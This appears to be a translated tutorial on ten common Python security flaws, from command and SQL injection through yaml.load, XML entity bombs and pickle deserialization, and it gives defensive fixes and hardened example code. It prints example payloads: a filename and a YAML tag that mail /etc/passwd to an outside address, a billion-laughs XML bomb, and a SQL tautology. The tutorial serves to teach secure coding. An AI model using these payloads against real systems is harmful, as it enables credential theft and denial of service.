2025-02-21 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/01 Report--
This article explains the common security problems in Python and how to fix them. The methods described here are simple, fast and practical.
1. Input injection
Injection attacks are widespread and common, and there are many types of injection affecting every language, framework and environment.
SQL injection happens when you write SQL queries by hand (rather than through an ORM) and mix string literals with variables.
Command injection can happen whenever a process is started with popen, subprocess or os.system and the arguments come from variables: when native commands are invoked this way, someone can set one of those values to something malicious.
Here's a simple script that invokes a child process with a user-supplied filename:
    import subprocess

    def transcode_file(request, filename):
        command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
        subprocess.call(command, shell=True)  # a bad idea!

An attacker could supply a filename such as "; cat /etc/passwd | mail them@domain.com (the leading double quote closes the quoted argument) or something equally dangerous.
Fix:
If you use a Web framework, use its built-in utilities to sanitize your input, and don't build SQL queries by hand unless there is a good reason to. Most ORMs have built-in sanitization methods.
For shells, escape input correctly with the shlex module, or better still pass an argument list instead of a shell string.
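The following is an added example (not the article's own code) showing the two injection classes above side by side: the article's shell-string pattern next to an argument-list invocation and a shlex.quote() form, and a string-built SQL query next to a parameterised one. The filenames, the users table and the tautology string are constructed for the demonstration; ffmpeg is assumed to be the tool being called, as in the article.

```python
import shlex
import sqlite3
import subprocess

# Constructed sample inputs: a benign filename and one carrying the kind of
# shell metacharacters the article describes.
GOOD_NAME = "holiday.mov"
BAD_NAME = 'x"; cat /etc/passwd | mail them@domain.com'


def transcode_command_unsafe(filename):
    # The article's pattern: the filename is interpolated into one string that
    # a shell will parse, so a quote and ';' inside it change the command.
    return 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)


def transcode_argv(filename):
    # Hardened form: an argument list and no shell. Whatever the filename
    # contains, ffmpeg receives it as exactly one argv element.
    return ["ffmpeg", "-i", filename, "output_file.mpg"]


def transcode_shell_line(filename):
    # If a shell string really is required (logging, a remote shell),
    # shlex.quote() wraps the value so the shell treats it as a single word.
    return "ffmpeg -i {} output_file.mpg".format(shlex.quote(filename))


def run_transcode(filename):
    # Real invocation with the hardened argv; shell=False is the default.
    return subprocess.run(transcode_argv(filename), check=False)


def find_user_unsafe(conn, username):
    # String-built SQL: a username containing a quote rewrites the query.
    return conn.execute(
        "SELECT id FROM users WHERE name = '%s'" % username
    ).fetchall()


def find_user(conn, username):
    # Parameterised query: the driver binds the value; it is never parsed as SQL.
    return conn.execute(
        "SELECT id FROM users WHERE name = ?", (username,)
    ).fetchall()


def demo_sql():
    # Constructed in-memory table; returns (rows from unsafe query, rows from safe query)
    # for a username that is a classic tautology.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    tautology = "nobody' OR '1'='1"
    return len(find_user_unsafe(conn, tautology)), len(find_user(conn, tautology))
```

shlex.split() of the quoted line gives back the same argv as transcode_argv(), which is a quick way to check that a quoting helper does what you expect; the tautology returns every row through the string-built query and none through the bound one.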
2. Assert statements
Do not use assert statements to keep users out of code they should not be able to reach.

    def foo(request, user):
        assert user.is_admin, "user does not have access"
        # secure code...

By default Python runs scripts with __debug__ set to True, but production deployments commonly run with optimization enabled (python -O), which strips assert statements and goes straight into the "secure" code regardless of whether the user is_admin.
Fix:
Use assert statements only to communicate with other developers, for example in unit tests or to guard against incorrect API usage.
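Added example (not from the article): the assert-guarded view is compiled once as a normal run and once with optimize=1, which is what python -O does to a whole program, so the stripping can be observed without restarting the interpreter. The view function and the user dictionaries are constructed for the demonstration; the fixed version uses an explicit check that raises PermissionError.

```python
import textwrap

# A view-like function kept as source text so it can be compiled with and
# without optimisation. Constructed for this example.
GUARDED_SOURCE = textwrap.dedent('''
    def view(user):
        assert user["is_admin"], "user does not have access"
        return "admin-only data"
''')


def run_guarded_view(user, optimize):
    # optimize=0 mirrors a normal run; optimize=1 mirrors `python -O`, where
    # assert statements are removed from the bytecode entirely.
    namespace = {}
    code = compile(GUARDED_SOURCE, "<guarded>", "exec", optimize=optimize)
    exec(code, namespace)
    try:
        return namespace["view"](user)
    except AssertionError:
        return "denied"


def view(user):
    # The fix: an explicit authorization check that survives optimisation.
    if not user["is_admin"]:
        raise PermissionError("user does not have access")
    return "admin-only data"


def run_fixed_view(user):
    try:
        return view(user)
    except PermissionError:
        return "denied"
```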
3. Timing attacks
A timing attack is essentially a way to expose behavior and algorithms by measuring how long it takes to compare supplied values. Timing attacks require precision, so they generally cannot be carried out over high-latency remote networks. Since most Web applications involve variable latency, it is almost impossible to mount timing attacks against HTTP Web servers.
However, if you have a command-line application that prompts for a password, an attacker can write a simple script that measures how long the comparison of its guess against the real password takes.
Fix:
Use secrets.compare_digest, introduced in Python 3.5, to compare passwords and other private values.
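Added example (not the article's code) of why the comparison leaks: a character-by-character comparison that stops at the first mismatch does an amount of work proportional to the matching prefix, which is what a timing measurement recovers. The counter makes that visible without relying on noisy wall-clock timing. The secret and guesses are constructed; the fix uses secrets.compare_digest from the standard library.

```python
import secrets


def naive_compare(expected, supplied):
    # Returns (match, characters_examined). Exiting at the first mismatch is
    # the behaviour that leaks: the work done depends on how much of the
    # supplied value matches the real one.
    examined = 0
    if len(expected) != len(supplied):
        return False, examined
    for a, b in zip(expected, supplied):
        examined += 1
        if a != b:
            return False, examined
    return True, examined


def constant_time_compare(expected, supplied):
    # secrets.compare_digest examines every byte regardless of where the
    # first mismatch is, so the comparison time does not depend on the input.
    return secrets.compare_digest(expected.encode(), supplied.encode())


def leak_profile(secret, guesses):
    # Map each guess to the amount of work the naive comparison did on it.
    return {g: naive_compare(secret, g)[1] for g in guesses}


# Constructed secret and guesses of equal length.
SECRET = "hunter2!"
GUESSES = ["aaaaaaaa", "huaaaaaa", "hunter2!"]
```

With the naive comparison the guess that shares a longer prefix with the secret is measurably more work, so an attacker can confirm the secret one character at a time.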
4. Temporary files
To create temporary files in Python, people often use the mktemp() function to generate a file name and then create a file with that name. This is unsafe because another process may create a file with the same name in the window between the call to mktemp() and the first process creating the file. The application may then load the wrong data or expose other temporary data.
Recent versions of Python emit a runtime warning if you call the wrong method.
Fix:
If you need temporary files, use the tempfile module's mkstemp() (or NamedTemporaryFile) rather than mktemp().
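Added example (not the article's code): mkstemp() opens the file itself with O_CREAT|O_EXCL and mode 0600, so there is no window between picking the name and creating the file, and no other user can read it. The racy pattern is shown only as a commented-out contrast; the data written is constructed.

```python
import os
import stat
import tempfile


def write_private_tempfile(data, suffix=".tmp"):
    # Racy pattern the article warns about (not executed here):
    #     name = tempfile.mktemp(suffix=suffix)
    #     with open(name, "wb") as f: ...   # someone else may own `name` by now
    #
    # mkstemp() creates the file atomically with O_EXCL and mode 0600 and
    # hands back an already-open descriptor, so the name cannot be hijacked.
    fd, path = tempfile.mkstemp(suffix=suffix)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
    except BaseException:
        os.unlink(path)
        raise
    return path


def tempfile_mode(path):
    # Permission bits only, e.g. 0o600.
    return stat.S_IMODE(os.stat(path).st_mode)


def read_and_remove(path):
    with open(path, "rb") as f:
        data = f.read()
    os.unlink(path)
    return data
```

The descriptor returned by mkstemp() is the one you should write through (os.fdopen), rather than reopening the path by name, which would reintroduce the race.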
5. Use yaml.load
Reference PyYAML documentation:
Warning: It is unsafe to call yaml.load with data received from an untrusted source! yaml.load is just as powerful as pickle.load, so you can call any Python function.
In this example from the popular Python project Ansible, you could supply the following value as (valid) YAML to Ansible Vault, and it would call os.system() with the argument given in the file:

    !!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
So loading YAML from user-supplied values effectively opens the application to attack.
Fix:
Always prefer yaml.safe_load unless you have a very good reason not to.
6. Parsing XML
If your application loads and parses XML files, you are probably using the XML standard library modules. Attacks via XML are mostly DoS style (designed to crash systems rather than leak data) and are common, especially when parsing external (i.e., untrusted) XML files.
The classic one is the "billion laughs" attack, so called because its payload usually contains a lot of "lol"s. The principle is that XML allows entities to reference other entities, so when the parser expands them while loading the file into memory it consumes gigabytes of RAM:

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
      <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
      <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
      <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
      <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
      <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>

Other attacks use external entity expansion. XML supports referencing entities at external URLs, and XML parsers usually fetch and load that resource without question. An attacker can use this to get around firewalls and reach restricted resources, because every request is made from a trusted internal IP address rather than from outside.
Another situation to consider is third-party dependencies that need to decode XML, for example for configuration files or remote APIs. You may not even know that a dependency is exposed to these types of attacks.
Fix:
Replace the standard library modules with defusedxml, which adds protection against these types of attacks.
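Added example (not the article's code, and not defusedxml itself) of the check defusedxml performs, done with the standard library's expat bindings: before the document is handed to ElementTree, a first pass rejects any entity declaration or external entity reference, so neither an entity bomb nor an external fetch can get started. The two documents are constructed; the "bomb" is a deliberately tiny two-level version of the shape shown above, harmless to parse but enough to trigger the guard.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares or references entities."""


def check_no_entities(data):
    # Pre-parse pass with expat. Raising inside a handler aborts Parse(), so
    # the document is rejected before any entity is expanded or fetched.
    parser = xml.parsers.expat.ParserCreate()

    def forbid_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        raise UnsafeXML("entity declaration %r is not allowed" % name)

    def forbid_external_ref(context, base, system_id, public_id):
        raise UnsafeXML("external entity reference %r is not allowed" % system_id)

    parser.EntityDeclHandler = forbid_entity_decl
    parser.ExternalEntityRefHandler = forbid_external_ref
    parser.Parse(data, True)


def parse_untrusted(data):
    # Only documents that pass the guard reach the real parser.
    check_no_entities(data)
    return ET.fromstring(data)


def is_safe(data):
    try:
        check_no_entities(data)
    except UnsafeXML:
        return False
    return True


# Constructed test documents.
SMALL_BOMB = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;">]>'
    b'<lolz>&lol1;</lolz>'
)
BENIGN = b'<?xml version="1.0"?><config><host>db.internal</host></config>'
```

Rejecting every entity declaration is stricter than the XML spec requires, but for data from outside the trust boundary it is the right default; defusedxml makes the same choice (forbid_entities=True) and additionally lets you forbid DTDs altogether.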
7. Contaminated site-packages or import paths
Python's import system is very flexible, which is great when you want to monkey-patch for tests or override core functionality.
But it is also one of the biggest security holes in Python.
Installing third-party packages, whether in a virtual environment or globally (which is generally discouraged), exposes you to any security vulnerabilities in those packages. Packages have been published to PyPI with names similar to popular packages that execute arbitrary code.
Another situation to consider is dependencies: they may contain vulnerabilities, and they can override default Python behavior through the import system.
Fix:
Take a look at http://PyUp.io and its security services, use a virtual environment for every application, keep the global site-packages as clean as possible, and check package signatures.
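Added example (not the article's code) of one concrete check for a contaminated import path: resolve where each named standard-library module would actually be imported from and flag any whose origin is outside the interpreter's stdlib directory. The search is done with importlib.machinery.PathFinder against an explicit path list, so it does not depend on what is already in sys.modules. The demo builds a constructed directory with a rogue json.py placed ahead of the stdlib, as a polluted working directory or site-packages would be.

```python
import importlib.machinery
import os
import sys
import sysconfig
import tempfile

# Where this interpreter's standard library lives (resolved through symlinks).
STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def find_shadowed(names, search_path=None):
    """Return {name: origin} for standard-library modules that would be
    imported from somewhere other than STDLIB_DIR on the given search path."""
    search_path = list(sys.path if search_path is None else search_path)
    shadowed = {}
    for name in names:
        spec = importlib.machinery.PathFinder.find_spec(name, search_path)
        if spec is None or not spec.has_location or spec.origin is None:
            continue  # built-in or frozen module: not loaded from a path at all
        origin = os.path.realpath(spec.origin)
        if not origin.startswith(STDLIB_DIR + os.sep):
            shadowed[name] = origin
    return shadowed


def demo():
    # Constructed scenario: a rogue json.py in a directory that sits ahead of
    # the stdlib on the import path. Returns (result on the normal path,
    # names flagged on the contaminated path).
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "json.py"), "w") as f:
            f.write("# rogue module standing in for the real json\n")
        clean = find_shadowed(["json", "csv"], sys.path)
        dirty = find_shadowed(["json", "csv"], [tmp] + sys.path)
    return clean, sorted(dirty)
```

A check like this belongs in an application's start-up or in CI, run over the stdlib modules the application imports; it catches the "typo-squat or shadow a stdlib name" case but is no substitute for verifying the packages you install.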
8. Deserializing pickles
Deserializing pickle data is just as bad as YAML. A Python class can declare a __reduce__ method that returns a string, or a callable together with a tuple of arguments to call it with when the object is reconstructed from a pickle. An attacker can use this to include a reference to a subprocess module and run arbitrary commands on the host.
Fix:
Never use pickle to deserialize data from untrusted or unauthenticated sources. Switch to another serialization scheme, such as JSON.
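Added example (not the article's code) covering both this section and the yaml.load one above, since the mechanism is the same: every class or callable a pickle stream references is resolved through Unpickler.find_class, so a restricted unpickler that allows only a short list of builtins blocks any __reduce__ payload before it is called. This is the pattern given in the pickle module documentation. The Hook class is constructed and harmless; it only stands in for an object whose __reduce__ would otherwise point the lookup at something like os.system. JSON is shown as the safe alternative.

```python
import builtins
import io
import json
import pickle

# Builtins that are safe to reconstruct from an untrusted stream.
SAFE_BUILTINS = {"range", "slice", "set", "frozenset", "complex"}


class RestrictedUnpickler(pickle.Unpickler):
    # Every global reference in the stream (a class, a function such as
    # os.system) passes through find_class, so this is the choke point.
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Hook:
    # Constructed stand-in: unpickling any instance needs a global lookup of
    # the callable in __reduce__, which is exactly what an attacker abuses.
    def __reduce__(self):
        return (Hook, ())


def classify(data):
    """('ok', value) for plain data, ('blocked', None) when a global lookup is refused."""
    try:
        return ("ok", restricted_loads(data))
    except pickle.UnpicklingError:
        return ("blocked", None)


def to_json(obj):
    # JSON can express only data, never code, so it is the right choice for
    # anything crossing a trust boundary.
    return json.dumps(obj, sort_keys=True)


def from_json(text):
    return json.loads(text)
```

The restricted unpickler is a mitigation for legacy code that cannot drop pickle yet; for new code the fix is still to not accept pickle (or yaml.load) from untrusted sources at all.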
9. Using the system Python runtime and not patching it
Most POSIX systems ship with a Python 2 version (usually an old one).
Sometimes the interpreter itself has vulnerabilities: CPython is written in C, and the common security issues in C concern memory handling, so they are mostly buffer overflows. CPython has had a number of overflow vulnerabilities over the years, each fixed in a subsequent release. In other words, a Python runtime that is upgraded promptly is safe.
Fix:
Install the latest version of Python for production applications and apply security updates promptly!
10. Not patching dependencies
Just like the Python runtime, dependencies also need to be patched regularly.
Fix:
Use a service like PyUp.io to check for updates, open pull requests against your applications, and run the tests to keep packages up to date.
At this point you should have a deeper understanding of the common security problems in Python and how to fix them. Now go and put them into practice!
© 2024 shulou.com SLNews company. All rights reserved.